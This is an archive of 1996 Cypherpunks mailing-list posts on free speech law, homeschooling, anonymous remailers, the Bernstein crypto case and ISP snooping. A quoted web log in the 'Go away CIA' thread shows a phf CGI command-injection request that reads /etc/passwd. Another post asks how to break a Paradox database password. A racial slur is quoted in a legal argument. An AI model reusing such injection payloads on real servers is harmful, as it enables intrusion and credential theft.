>"nigger" where a black woman could overhear.

Whoops! I didn't mean to intersect with "workplace" issues--I mean simple,
pure, nonworkplace-related speech.

To make this clearer and to separate Title VII stuff out:

If California were to, say, ban speech which included the word "orange," or
to ban speech which mentioned "Allah," wouldn't the First trump this
attempt?

As to Title VII and all that garbage, I think the First Amendment means
what it says, and that there's something desperately wrong when many blacks
call each other "niggers," as in "Yo, Nigga!," but nonblacks can be hit
with lawsuits for letting this word slip out.

By the way, I just read chunks of Ronald Dworkin's new book on the
Constitution, and he makes some interesting comments on the feminist view
that words hurtful to women ought to be censored...he's against such
interpretations, and argues that if speech hurtful to women, or images
hurtful to women, etc., are banned, then why not ban speech critical of
Creationists, and speech insulting to Flat Earthers?

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael E. Carboy" <carboy@hooked.net>
Date: Tue, 24 Sep 1996 01:17:00 +0800
To: cypherpunks@toad.com
Subject: Snooping ISP admin??
Message-ID: <32468D68.5E2@hooked.net>
MIME-Version: 1.0
Content-Type: text/plain


Greetings All,

Question for the group:  I have encountered a situation that causes me
to believe an ISP is snoopingthrough encrytped mail.  It seems that
PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have
encountered "POP3 account in use by another user" several times in the
past few days and I am the only user... wondering if that "in use"
messsage is the result of a clumsy sysadmin being caught with his hand
in the cookie jar.  Any thoughts from the group???  If those more
knowledgeable than I deem these NOISE... my sincere apologies.

regards,
Michael E. Carboy
carboy@hooked.net
carboy@carboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Mon, 23 Sep 1996 23:48:40 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <ae6b72ee07021004c91c@[207.167.93.63]>
Message-ID: <324677FF.3A48@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 4:31 AM 9/23/96, Lucky Green wrote:
> >On Sun, 22 Sep 1996, snow wrote:
> >> I would agree that parents can do as good or better at _most_ 
> >> subjects thru about the 3rd or 4th grade, and I do agree that 
> >> most of todays schools are shit, however there is one area--
> >> social skills--that homeschooling simply can't compete. 

Proponents of mass public education love to trot that one out, probably
because it sounds good and appeals to common sense.  However, I
sincerely
doubt it's true in any way.  For example, I'd like to see some actual
comparison of the social skills (and, umm, how do you measure that 
anyway?  I don't remember taking any social skills tests in school to
make sure I was acquiring that valuable stuff) of public school victims
and homeschooled people.  If it's such a problem, where are all those
social freaks who got that way due to homeschooling?

Before the Industrial Revolution, homeschooling was of course quite
common.  Many "public schools" were simply cheap boarding houses for
lower-middle class children (see Nicholas Nickelby for a colorful
example).  Those with the means hired tutors.

> >> Children need to learn how to interact with one another in groups 
> >> larger than a family unit. I don't think that homeschooling can
> >> accomplish this nearly as well as the public (or private) schools 
> >> could.

Please note that homeschooling does not imply that parents isolate their
children from contact with the world until they're at voting age.  Also,
note that the public elementary schools I attended seemed hell-bent on
*preventing* any sort of interaction with a group of peers.  I don't
recall being encouraged to do much but shut up and perform the
uninspired
textbook assignments I was given.


______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 24 Sep 1996 05:59:44 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199609231350.GAA29493@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash ksub latent cut ek mix reord";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver. The nym.alias.net server will be listed
soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

Last update: Mon 23 Sep 96 6:46:13 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
squirrel mix@squirrel.owl.de              ++++.+---++   2:19:14  99.99%
jam      remailer@cypherpunks.ca          ************    16:28  99.98%
mix      mixmaster@remail.obscura.com     ++--.+-++++-  1:07:11  99.98%
cyber    alias@alias.cyberpass.net        +*+ -*-*****    29:26  99.86%
exon     remailer@remailer.nl.com         #****# #*+##     1:12  99.84%
replay   remailer@replay.com              *********+**     4:14  99.55%
dustbin  dustman@athensnet.com            ------+++-+   1:01:14  99.54%
winsock  winsock@c2.org                   --++.-------  3:29:10  99.49%
lead     mix@zifi.genetics.utah.edu       ++++++-+ ++*    35:32  99.43%
extropia remail@miron.vip.best.com        --.-.------   8:25:42  98.99%
middle   middleman@jpunix.com             - --- -- -    2:14:50  97.72%
balls    remailer@huge.cajones.com        * *  *******     5:01  97.12%
haystack haystack@holy.cow.net            ####### #--#    55:47  96.49%
amnesia  amnesia@chardos.connix.com       ----.- ----   4:41:47  94.33%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Tue, 24 Sep 1996 05:43:49 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
Message-ID: <3.0b24.32.19960923071112.007208a8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:44 PM 9/22/96 -0700, John Gilmore wrote:
[snip]
>The wording there is taken directly from the controlling Supreme Court
>case, which I believe is the Pentagon Papers case.  

I double-checked, and it is Potter Stewart from that case.  Here's the
whole paragraph:

"But in the cases before us, we are asked neither to construe specific
regulations nor to apply specific laws. We are asked, instead, to perform a
function that the Constitution gave to the Executive, not the Judiciary. We
are asked, quite simply, to prevent the publication by two newspapers of
material that the Executive Branch insists should not, in the national
interest, bepublished. I am convinced that the Executive is correct with
respect to some of the documents involved. But I cannot say that disclosure
of any of them will surely result in direct, immediate, and irreparable
damage to our Nation or its people. That being so, there can under the
First Amendment be but one judicial resolution of the issues before us. I
join the judgments of the Court."

Interestingly, Stewart says earlier:

"I should suppose that moral, political, and practical considerations would
dictate that a very first principle of that wisdom would be an insistence
upon avoiding secrecy for its own sake. For when everything is classified,
then nothing is classified, and the system becomes one to be disregarded by
the cynical or the careless, and to be manipulated by those intent on
self-protection or self-promotion. I should suppose, in short, that the
hallmark of a truly effective internal security system would be the maximum
possible disclosure, recognizing that secrecy can best be preserved only
when credibility is truly maintained."

http://www.nfoweb.com/folio.pgi/ussc-1/query=[field+case+name!3A!22new+york+
times!22]/doc/{@461998}/hit_headings?

>The example used
>in that case was the departure date and route of a ship carrying US
>troops to war.  The government could sue people who threatened to
>publish such information, prior to publication, and have some chance
>of winning the case.  It's not a guarantee, just a pre-qualification.
>The idea is that if they CAN'T show such a danger, they have NO chance
>of winning.

This is the beauty of Patel's earlier ruling.  The fact that we are
possibly talking about speech places a much stronger burden on the gov to
restrict it.

[snip]
>The Supreme Court would ignore the prior restraint line issue anyway,
>because it isn't a factor in this case.  The government isn't arguing
>that they have the right to prior-restrain us because of direct,
>immediate and irreperable damage.  Instead they argue that the
>publication itself is being controlled only for its function, not for
>the content of the publication, and therefore in controlling the
>function, they can "incidentally" control the publication.
[snip]

Anyone who was at the hearing on Friday heard some form of the word
"function" repeated many times.  This definitely seems to be the heart of
the gov's argument.  I think it's not gonna float, but IANAL, either :)



Rich


______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 24 Sep 1996 05:50:11 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <ae6b7e5e0802100478fe@[207.167.93.63]>
Message-ID: <Pine.SUN.3.91.960923065805.28623E-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Sep 1996, Timothy C. May wrote:

> If California were to, say, ban speech critical of women's or homosexual's
> rights, would not the First Amendment trump this attempt?

Not necessarily.

The Supreme Court has upheld Title VII's ban on workplace "harassment." 
The Court said it occured when "discriminatory intimidation, ridicule, and
insult" in a workplace create an uncomfortable "working environment." 

Then there's public accomodation law, under which the (I recall) Greek
owner of a privately-operated diner was held liable for using the word
"nigger" where a black woman could overhear. 

Clearly, speech that makes someone uncomfortable must be banned by the 
government.

-Declan

(More on some of this at http://joc.mit.edu/)


// declan@eff.org // I do not represent the EFF // declan@well.com //





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 23 Sep 1996 22:25:22 +0800
To: rp@rpini.com (Remo Pini)
Subject: Re: Where to write crypto?
In-Reply-To: <9609230633.AA18985@srzts100.alcatel.ch>
Message-ID: <199609231224.HAA02299@homeport.org>
MIME-Version: 1.0
Content-Type: text


Remo Pini wrote:
| > If I want to go to a country outside the United States to write
| > cryptographic code that will be freely distributable, what's the
| > best place to go?
| 
| Switzerland has NO crypto laws (yet)...

Switzerland is not the most liberal (libertarian) of countries.
Getting a work permit can be very tough.  However, there are crypto
companies and research groups.  Haeglin and ETH-Zurich (ETH is Swiss
Federal Institute of Technology) spring to mind.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 23 Sep 1996 23:31:00 +0800
To: johnbr@atl.mindspring.com (John Brothers)
Subject: Re: Internet File System?
In-Reply-To: <1.5.4.32.19960922191022.00736898@pop.mindspring.com>
Message-ID: <199609231251.HAA02343@homeport.org>
MIME-Version: 1.0
Content-Type: text


John Brothers wrote:

| The other day, it occurred to me that Java could really take off if there
| was some sort of file system.  And, since you can't write to local files
| with Java, the obvious solution is to set up the 'fopen, fclose(), etc)
| set of functions that are 'rpcs' to some server application on the same
| computer as the web server the applet comes from.

	Interesting idea.  But, this requires that for disk access,
the applet have network access.  Violates the principle of least
privledge.

	The correct solution seems to me give the applet limited local
disk access.  To those who claim this can't be done, I point to the
UNIX kernel, which, with a small set of primitives, controls disk
access pretty effectively.  (Quotas were added in 1984.)

	This micro kernel could be added outside of the Java VM, so
that the Java code can't touch it, only call it.  The V7 kernel is
pretty small and efficient by todays standards.   Might want to use
BSD4.4 instead, and also get portals, which would allow you to use
/dev/tcp/www.netscape.com/80 as a file with certain permissions.  See 
http://www.bsdi.com/bsdi-man?proto=1.1&msection=ALL&apropos=1&query=portal



Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 23 Sep 1996 22:52:51 +0800
To: Remo Pini <cypherpunks@toad.com
Subject: RE: Where to write crypto?
Message-ID: <3.0b19.32.19960923075240.00e9ea44@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:33 AM 9/23/96 +0200, Remo Pini wrote:
>Switzerland has NO crypto laws (yet)...
>

However they are cooperating with the Gang of Seven (G7) Net restriction
efforts.  

See:

http://www.admin.ch/ejpd/d/bj/internet/indexe.htm

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DMiskell@envirolink.org (Daniel Christopher Miskell)
Date: Tue, 24 Sep 1996 00:19:30 +0800
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: A daily warning regarding Tim ... [edited]
Message-ID: <v01540b00ae6c3f4f3884@[150.160.45.149]>
MIME-Version: 1.0
Content-Type: text/plain


>On Fri, 20 Sep 1996, John Anonymous MacDonald wrote:
>
>> Tim C[*] * studied yoga back-streching exercises for
>> five years so he could * * (*).
>
>Likely the NSA has nothing better to do these days.  They got bored with
>just listening, so now they're spamming.  Can we lock this fucker out of
>the list?  Sure, he'll probably pick another nym to post from...
>


Can't lock him out of the list, but you can either set up a kill file, or find
something like the 3.0b version of Eudora, which has filters; you can set it up
where, if an incoming message has a certain From: string, it is transferred
directly into the Trash mail folder, which is, as a rule, cleaned up before
quitting.

Daniel.

--
If in fact we are the only intelligent life on this planet, why the fuck are
we in this goddamn mess?
--
Find my public key on the World Wide Web -- point your browser at:
http://bs.mit.edu:8001/pks-toplev.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Tue, 24 Sep 1996 04:52:26 +0800
To: cypherpunks@toad.com
Subject: RE: USA_exe
Message-ID: <199609231527.IAA24066@well.com>
MIME-Version: 1.0
Content-Type: text/plain



 
John (jya@pipeline.com) posts: 
  
>The Washington Post reports at length today on the Defense
>Department's disclosure yesterday of heretofore classified
>training manuals used in the School of the Americas to instruct
>Latino troops on killing a wide range of civilians for political
>purposes.

This is not particularly new news, I have a copy at home of one of
these manuals, it was put out by a humans rights group that got
their hands on it during all the El Salvador business.

It's as nasty as it sounds...

Further info on request.

Brian

"Semiautomatic's and Boundless Love."

  
    
  
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 24 Sep 1996 05:25:44 +0800
To: carboy@hooked.net (Michael E. Carboy)
Subject: Re: Snooping ISP admin??
In-Reply-To: <32468D68.5E2@hooked.net>
Message-ID: <199609231530.IAA14624@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael E. Carboy writes:
> 
> Greetings All,
> 
> Question for the group:  I have encountered a situation that causes me
> to believe an ISP is snoopingthrough encrytped mail.  It seems that
> PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have
> encountered "POP3 account in use by another user" several times in the
> past few days and I am the only user... wondering if that "in use"
> messsage is the result of a clumsy sysadmin being caught with his hand
> in the cookie jar. 

It's from a clumsy programmer- popd is known to hang up under
certain conditions.

> Any thoughts from the group??? 

If the sysadmin is reading your PGP mail, let him.  It's very very
unlikely that he has the resources available to crack a PGP
message in this century.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Mon, 23 Sep 1996 17:58:40 +0800
To: cypherpunks@toad.com
Subject: RE: Where to write crypto?
Message-ID: <9609230633.AA18985@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Mon Sep 23 08:31:11 1996
> 
> 
>  On Sat, 21 Sep 1996, Dan McGuirk wrote:
> 
> If I want to go to a country outside the United States to write
> cryptographic code that will be freely distributable, what's the
> best place to go?

Switzerland has NO crypto laws (yet)...

- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMkYusBFhy5sz+bTpAQHziQf/eGRk90lC1/0NNMj9Qco54BHZhElwPCnK
CsH8UJr90Ue68K5GA5VSBcWrBw/7j/AxaM5RiwnNzeuyw1GwYWlSKyfKzczqU6Z/
2DuCGz/cRkDuUYjK5PrWbh59Pr6PH8flqnFEap9cWU1Fl8BjdCBX+6IYTjVh1Ph4
Z6M7kYB3rDlTYECB8CtZhAELq89+nD4Rk1SI/lIckGNOS/tSESBQ+5L/t+JDFmUd
e6w07eRchN22+XDkVxBJ6UNPGR+3IiaNduOMXDyAgsHetXkfN51TaGOSpTlJltOz
Wd7K0vjhGPDNhSgAa9dQ5J3B8ckHGsELHloXvjYfzfzW/tDOtbdjmg==
=Whww
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wearen Life <runnerfx@octet.com>
Date: Tue, 24 Sep 1996 01:13:42 +0800
To: Shane Brath <sbrath@froglit.scitele.com>
Subject: Re: Go away CIA
In-Reply-To: <Pine.BSD/.3.91.960922192936.9708B-100000@froglit.scitele.com>
Message-ID: <Pine.BSF.3.95.960923084413.3884C-100000@iron.octet.com>
MIME-Version: 1.0
Content-Type: text/plain


The CIA has many powers both great and small. If the can cover up findings
of UFO's  and Murders I am pretty sure they can watch some puny web
server.

On Sun, 22 Sep 1996, Shane Brath wrote:

> 
> 
> On Sat, 21 Sep 1996, Wearen Life wrote:
> 
> > I wont be suprised if they where ALSO watching who was visting your page.
> > I think now is the time to start looking in your hard drive or floppy
> > disk for anything that my incrimanate you. (did i spell that right)?
> 
> My 2 cents. 
> 
> But how would they go about globaly watching who goes to your URL, unless 
> they hack into your server and look at the log, or have a network sniffer 
> at a access point feeding you?
> 
> > > Well well...
> > > 
> > > After putting up the CIA hack mirror page on http://www.skeeve.net/cia/
> > > I learnt a few things.
> > > 
> > > o it got 50,000 hits in 1 day
> > > o everyone from the cia, senate, fbi, nsa (ncsc) and every other bloody US gov
> > >   department looked at it masses of times. The CIA looked at it every 10-15
> > >   minutes.
> > > zztop{root}:15: cat skeeve.net-access_log | grep ucia.gov | wc -l
> > >     281
> > > 
> > > o Even the CIA tries to hack you.  
> > > 
> > > relay1-ext.ucia.gov unknown - [21/Sep/1996:01:56:44 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 1180
> > > 
> > > o Dozens of in.fingerd/in.telnetd attempts from ucia.gov, some mil sites and
> > >   ncsc.mil sites.
> [ rest of text snipped ]
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 24 Sep 1996 05:08:23 +0800
To: cypherpunks@toad.com
Subject: Bank for International Settlement's Security of Digital CashReport now on the web...
Message-ID: <v03007802ae6c38fcb5c0@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: Ian Grigg <iang@systemics.com>
Precedence: Bulk
Date: Mon, 23 Sep 1996 12:22:59 +0200
From: Ian Grigg <iang@systemics.com>
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: BIS_rep

Thanks to all the help I got last week, I have located the
BIS report on Smart Card Security.  I have C&P'd and squeezed
it into HTML format.  There are still many errors in it, notably
many double words that C&P contributed, and I haven't touched the
Annexes (messy footnotes, no graphics or headings).  However, for
those desparate to get their hands on it, go to our page:

	http://www.systemics.com/docs/papers/

and type (anti-bot protocol format):

	BIS_smart_security.html

at the end of the URL.  The real (no errors :-) document is located at:

	http://www.bis.org/publ/cpss18.htm

but only the forward, exec summary and intro are there at the
moment.  When they are all there, I will drop my version.  I
am not really that keen on repairing the errors in my version,
as I gather that BIS will make the original available some day.

But last I looked, they didn't have an email address, so who can say?

--
iang
iang@systemics.com


--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Hughes <eric@sac.net>
Date: Tue, 24 Sep 1996 06:18:34 +0800
To: cypherpunks@toad.com
Subject: List participation
Message-ID: <2.2.32.19960923172509.00d6e4e4@flamingo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


I have been informed that Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com> wrote:
> [...] Tim's off-topic spews have driven Eric Hughes, John Gilmore,
> Rich Salz, and many other former valuable contributors off the
> mailing list [...]

As for me, I stopped having time to read cypherpunks a year and a half ago.
Tim had nothing to do with it.  The cypherpunks list has changed and I have
changed; so be it.

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 24 Sep 1996 06:03:22 +0800
To: cypherpunks@toad.com
Subject: Re: More proposals for European censorship
Message-ID: <199609231442.HAA20480@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Asgaard writes:
> On Thu, 19 Sep 1996, E. Allen Smith forwarded:
> 
> >> STRASBOURG, France (Sep 19, 1996 11:24 a.m. EDT) - The European
> >> Parliament pressed the European Union on Thursday to act to curb child
> >> sex and trafficking rings, saying the fight against sexual abuse of
> >> children must be an "absolute priority."

> It's probably no coincidence that the recently busted, utter horrible
> child-molesting ring, with obvious protection from various persons
> in the establishment, was centered in Belgium - that's where the EU
> bureaucrat nomenklatura play their power games and go to bordellos.

> Asgaard

What exactly are you suggesting when you say 'it's probably no
coincidence?" I can't quite figure it out.

[While I've not been following the case in detail, it involves a ring
of criminals in Belgium who kidnapped children to use them in 
child pornography. At least two little girls were starved to death
when they're usefullness was over.]

Are you suggesting that someone specifically set up a ring of 
child pornographers/murders in Belgium, then let it get caught, in
an attempt to influence the EU parliment?

Or are you suggesting that this particular gang of sub-humans was
exposed at this time in an attempt to influence policy, implying that
the Belgian LEAs knew about, but did not stop the ring until they
needed a publicity coup?

I find such notions utterly beyond rationality.

Do you expect we're going to see a statement from some Belgian
police investigator to the effect of "Yes, I  knew they were raping and
killing children, but was told to do nothing, and I obeyed."? 

There is a tendency of many on this list to demonize those we 
disagree with. If a person or group takes the 'wrong' stance on 
cryptography, key "escrow", etc, many list members will act as 
if that person or group were capable of any atrocity, and is acting out
of the very worst of motives and hidden agendas.

Such an attitude is common, but not desirable in the modern world.
It served some purpose when war involved the literal massacre of 
one's opponents - it's easier to commit genocide against the tribe
over the ridge if you demonize them into not-quite-humans, but in
the modern world this is not a rational option.

While it's possible to  regard many policies of governments,
ill-informed, self-serving, populist, and wrong, to act as if there is no
significant differences between real democracies and the worst 
authoritarian dictatorships is absurd. 

Peter Trei (not representing my employer)
trei@process.com

"Your enemy is never a villain in his own eyes. Keep this in mind; 
it may offer a way to make him your friend. If not, you can kill him 
without hate -- and quickly. " - Heinlein

Reccomended for US readers: "Parliment of Whores" by PJ O'Rourke

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DMiskell@envirolink.org (Daniel Christopher Miskell)
Date: Tue, 24 Sep 1996 06:03:08 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Public Schools
Message-ID: <v01540b00ae6c1c94c59d@[150.160.45.149]>
MIME-Version: 1.0
Content-Type: text/plain


>An awful lot of accomplished persons grew up in isolated areas, on small
>farms, and were educated in very small classrooms (or at home).

I can speak of this from experience.  I (currently) live in the near vacinity
of a town we amiably named "cowtown", and used to go to a small ton high
school.  As it turns out, one of the graduates before me at that school went
on to become an astronaut -- after living in almost-vacant "cowtown" all
his life.

Makes /me/ proud to be a citizen of such lightly populated areas.  Besides
that,
it's quieter, safer, and if the government comes for me, I have a kill zone of
at least 5 miles.  Woohoo!

Daniel.

--
If in fact we are the only intelligent life on this planet, why the fuck are
we in this goddamn mess?
--
Find my public key on the World Wide Web -- point your browser at:
http://bs.mit.edu:8001/pks-toplev.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@amaonline.com>
Date: Tue, 24 Sep 1996 05:51:00 +0800
To: cypherpunks@toad.com
Subject: Paradox db passwords/encryption
Message-ID: <199609231753.KAA22705@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Mon Sep 23 12:52:32 1996
Sorry to disturb everyone, but I've got a questions that is (gasp!) 
immediately related to crypto:

Does anyone have any info on the encryption used in the Paradox (4.5 for 
Win) database? I've got someone that has an encrypted (well, 
password-protected :-) Paradox database that needs some maintenance, and 
the person that knew the password is now - shall we say - 'no longer with 
them'. Right now, doesn't matter if it's something clever, or a brute-force 
hack; they just need to get into the tables and such.

Dave Merriman

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED. Visit my web
site at         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMkYXlcVrTvyYOzAZAQGcxgQAleY6gXoM1n0AbYSUogW9Zo4brlHgsEHW
vs3aAh+DQEaWJKc9ltXlDK94su9uJbAo3gb4cvG0EnBDifpqlS/bya7fG9KlcM6H
k6REe2Ui6xBLtbjJTa5fmAjmeLYPSKnF5z6Eql8VpdZPoS0hqKZKgdyogMrai4Dx
esOt90XBqVk=
=hibj
-----END PGP SIGNATURE-----





